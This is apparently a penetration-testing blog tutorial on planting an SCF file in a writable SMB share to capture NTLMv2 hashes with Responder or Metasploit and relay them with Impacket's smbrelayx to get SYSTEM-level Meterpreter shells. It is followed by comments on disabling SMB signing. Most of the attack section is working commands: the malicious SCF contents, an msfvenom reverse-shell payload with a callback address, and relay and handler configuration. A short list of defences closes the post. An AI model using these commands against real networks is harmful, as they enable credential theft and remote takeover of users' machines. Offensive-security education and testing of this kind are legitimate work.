SMB Share – SCF File Attacks

SMB is a protocol which is widely used across organisations for file sharing purposes. It is not uncommon during internal penetration tests to discover a file share which contains sensitive information such as plain-text passwords and database connection strings. However even if a file share doesn’t contain any data that could be used to connect to other systems but it is configured with write permissions for unauthenticated users then it is possible to obtain passwords hashes of domain users or Meterpreter shells.

Gathering Hashes

It is not new that SCF (Shell Command Files) files can be used to perform a limited set of operations such as showing the Windows desktop or opening a Windows explorer. However a SCF file can be used to access a specific UNC path which allows the penetration tester to build an attack. The code below can be placed inside a text file which then needs to be planted into a network share.

1
2
3
4
5
[Shell]
Command=2
IconFile=\\X.X.X.X\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
SCF File - Contents

SCF File – Contents

Saving the pentestlab.txt file as SCF file will make the file to be executed when the user will browse the file. Adding the @ symbol in front of the filename will place the pentestlab.scf on the top of the share drive.

SCF File

SCF File

Responder needs to be executed with the following parameters to capture the hashes of the users that will browse the share.

1
responder -wrf --lm -v -I eth0
Responder - Parameters for SCF

Responder – Parameters for SCF

When the user will browse the share a connection will established automatically from his system to the UNC path that is contained inside the SCF file. Windows will try to authenticate to that share with the username and the password of the user. During that authentication process a random 8 byte challenge key is sent from the server to the client and the hashed NTLM/LANMAN password is encrypted again with this challenge key. Responder will capture the NTLMv2 hash.

Responder - NTLMv2 via SCF

Responder – NTLMv2 via SCF

Alternatively to Responder, Metasploit Framework has a module which can be used to capture challenge-response password hashes from SMB clients.

1
auxiliary/server/capture/smb
Metasploit - Capture SMB Module

Metasploit – Capture SMB Module

As previously when the user will browse the same share his password hash will be captured by Metasploit.

Metasploit - NTLMv2 Captured

Metasploit – NTLMv2 Captured

If the password policy inside the company is sufficient it will take possibly days or weeks for the attacker to crack the captured hash.

Meterpreter Shells

The main advantage of the technique above it that it doesn’t require any user interaction and automatically enforces the user to connect to a share the doesn’t exist negotiating his NTLMv2 hash. Therefore it is also possible to combine this technique with SMB relay that will serve a payload in order to retrieve a Meterpreter shell from every user that will access the share.

MSFVenom can be used to generate the payload that it will executed on the target:

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.171 LPORT=5555 -f exe > pentestlab.exe
MSFVenom - Payload Generation for SMB Relay

MSFVenom – Payload Generation for SMB Relay

Coresecurity has released a set of python scripts called Impacket that can perform various attacks against Windows protocols such as SMB. Using the smbrelayx python script it is possible to set up and SMB server that will serve a payload when the target host will try to connect. This will performed automatically since the SCF file will enforce every to user to connect to a non-existing share with their credentials.

1
./smbrelayx.py -h Target-IP -e ./pentestlab.exe
Impacket - SMB Relay Server

Impacket – SMB Relay Server

Metasploit Framework needs to be used as well in order to receive back the connection upon execution of the pentestlab.exe on the target.

1
exploit/multi/handler

The module needs to be configured with the same parameters as the generated payload.

1
2
3
4
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.171
set LPORT 5555
exploit
Metasploit - Multi Handler Module for SMB Relay

Metasploit – Multi Handler Module

When the user will browse the share the SMB server will receive the connection and it will use the username and the password hash to authenticate with his system and execute the payload to a writable share.

Impacket - SMB Relay Attack

Impacket – SMB Relay Attack

A Meterpreter session will received. However in order to avoid losing the connection it is necessary to migrate to a more stable process.

Meterpreter - List Running Processes

Meterpreter – List Running Processes

The migrate command and the process ID needs to be used.

Meterpreter - Process Migration

Meterpreter – Process Migration

In this example the process 1600 corresponds to svchost.exe process which is running with SYSTEM privileges.

Meterpreter - List of Processes for Migrate

Meterpreter – List of Processes for Migration

Running the getuid from a Meterpreter console will obtain the current UID which is now SYSTEM.

Meterpreter - Retrieve Current UID

Meterpreter – Retrieve Current UID

The same attack can be also implemented by Metasploit framework.

1
2
3
4
exploit/windows/smb/smb_relay
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.171
exploit
Metasploit - SMB Relay Module

Metasploit – SMB Relay Module

An SMB server will established which will authenticate with the target by using the username and the password hash, deliver a payload on a writeable share, execute the payload with the rights of the user as a service, perform the clean up and give a Meterpreter session.

Metasploit - SMB Relay Attack

Metasploit – SMB Relay Attack

Interaction with the existing sessions can be performed with the sessions command.

Metasploit - SMB Relay Sessions

Metasploit – SMB Relay Sessions

Conclusion

This technique exploits something that is really common in all the networks like shares in order to retrieve password hashes and get meterpreter shells. The only requirement is that the user needs to browse the share that contains the malicious SCF file. However these attacks can be prevented by performing the following:

  • Use of Kerberos Authentication and SMB Signing
  • Disallow write permissions in file shares for unauthenticated users
  • Ensure that NTLMv2 password hash is used instead of LanMan

asolino commented on 13 Sep 2017

Hey @chacalito

smbrelayx.py indeed works against Windows 2012 (I actually tested it against Windows 2016). The issue here has to do with the server’s configuration.
If you’re targeting a domain controller (meaning, you’re trying to relay credentials against the DC) no SMB Relay attack will work since DCs are enforcing SMB signing for any client connecting to them.

This could also happen when targeting other servers in the domain, depending on the GPOs applied in the domain joined workstations.

The GPOs that need to be changed depends on who’s enforcing signing, but in general are these two:

Microsoft network client: Digitally sign communications (always)
Microsoft network client: Digitally sign communications (if server agrees)
Microsoft network server: Digitally sign communications (always)
Microsoft network server: Digitally sign communications (if client agrees)

If you disabled both, and you’re still receiving the Signature is REQUIRED message it is because you didn’t disable them in the right GPO, or you’re still targeting the DC. Getting the Wireshark capture will help me understand who’s enforcing it (client or server). You can check that in the first SMB messages exchanged (NEGOTIATE packets).

Hope this helps,

Hi @asolino
Thank you so much for your help. My delay to reply was because even disabling these GPOs I was keeping receiving the same log message (Signature os REQUIRED), but after disablin the 2 below keys via regetid [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameter{EnableSecuritySignature}] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameter{RequireSecuritySignature}] it worked.

 

However I got a new trouble , after few seconds that I compromised the server and the tool executed the payload, the session on metasploit handler dies. The own smbrelayx remove the .exe as the log shows below:

[-] 192.168.0.108 is being attacker at the moment, skipping.. 
[*] Service Installed.. CONNECT!
[*] Opening SVCManager on 192.168.0.108.....
[*] Stoping service SItD.....
[*] Removing service SItD.....
[*] Removing file LsetwAWv.exe.....

It’s so fast that I have no time enough to migrate the session. I saw the possible parameters with –help but I didn’t see any parameter to keep the session alive for more time.

There is a way to make it takes longer?

References